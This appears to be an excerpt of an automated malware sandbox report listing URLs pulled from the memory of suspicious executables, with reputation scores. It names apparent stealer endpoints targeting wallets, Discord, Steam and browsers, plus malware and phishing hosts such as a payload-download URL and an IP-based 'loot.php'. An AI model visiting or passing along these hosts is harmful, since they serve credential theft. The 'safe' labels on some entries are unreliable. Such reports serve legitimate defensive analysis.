Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://tempuri.org/IContract/ExtensionNordVPNResponseH9Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005960000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.000000000590E000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.00000000059B0000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://g.live.com/odclientsettings/Prod.C:edb.log.43.dr, qmgr.db.43.drfalse
                  • URL Reputation: safe
                  unknown
                  https://t.gogame.vMon17742f90b916675f2.exe, 00000012.00000003.2013350124.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://curl.se/setup_install.exefalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://tempuri.org/IContract/ExtensionBrowsersMon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://wfsdragon.ru/Mon17b5f403be4d8d6b.exe, 00000017.00000002.2185781811.0000000003267000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 9%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://tempuri.org/IContract/ExtensionSteamFilesMon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://45.9.20.13/partner/loot.php?pub=mixone?Mon1785436ae78.exe, 0000001A.00000002.4154497418.0000000001A6E000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequenceMon179e1058f256.exe, 0000001D.00000002.4163393063.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002761000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://t.gogamec.com:443/2302/sqlite.date.datMon17742f90b916675f2.exe, 00000012.00000003.2013350124.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  http://tempuri.org/IContract/ExtensionDiscordLRMon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F5E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000072C1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A9F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://tempuri.org/IContract/ExtensionColdWalletsLRMon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F5E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000072C1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A9F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://niemannbest.me/?username=p11_2Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.00000000024E4000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 12%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  unknown
                  https://topniemannpickshop.ccMon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002519000.00000004.00000800.00020000.00000000.sdmp, Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002473000.00000004.00000800.00020000.00000000.sdmp, Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.00000000024E4000.00000004.00000800.00020000.00000000.sdmp, Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.000000000248B000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 14%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://niemannbest.me/?username=p11_1Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002498000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 14%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  unknown
                  http://tempuri.org/IContract/InitDisplayMon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameMon178817e243.exe, 00000016.00000002.4158008324.0000000003141000.00000004.00000800.00020000.00000000.sdmp, Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002473000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://tempuri.org/IContract/ConfirmResponseMon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://t.gogamec.com:443/2302/sqlite.dat02/sqlite.datMon17742f90b916675f2.exe, 00000012.00000003.2013350124.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  unknown
                  https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 0000002B.00000003.1818483646.000002804DAE2000.00000004.00000800.00020000.00000000.sdmp, edb.log.43.dr, qmgr.db.43.drfalse
                  • URL Reputation: safe
                  unknown
                  http://tempuri.org/IContract/InitResponseMon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://hsiens.xyz/addInstallImpression.php?key=125478824515ADNxu2ccbwe&ip=&oid=139setup_install.exe, 00000002.00000002.1969543955.0000000002584000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 14%, Virustotal, Browse
                  • Avira URL Cloud: phishing
                  unknown
                  http://tempuri.org/IContract/ExtensionNordVPNMon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://wns.windows.com/Lexplorer.exe, 0000002F.00000002.4182753346.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.1918788309.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://tempuri.org/IContract/EnvironmentSettingsLRMon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F5E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000072C1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A9F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://niemannbest.meMon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002519000.00000004.00000800.00020000.00000000.sdmp, Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002498000.00000004.00000800.00020000.00000000.sdmp, Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.00000000024E4000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  https://t.gogamec.com//yMon17742f90b916675f2.exe, 00000012.00000003.2672226318.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  https://niemannbest.me/?username=p11_7Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002519000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  https://t.gogamec.com/2302/sqlit.~Mon17742f90b916675f2.exe, 00000012.00000003.2013350124.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
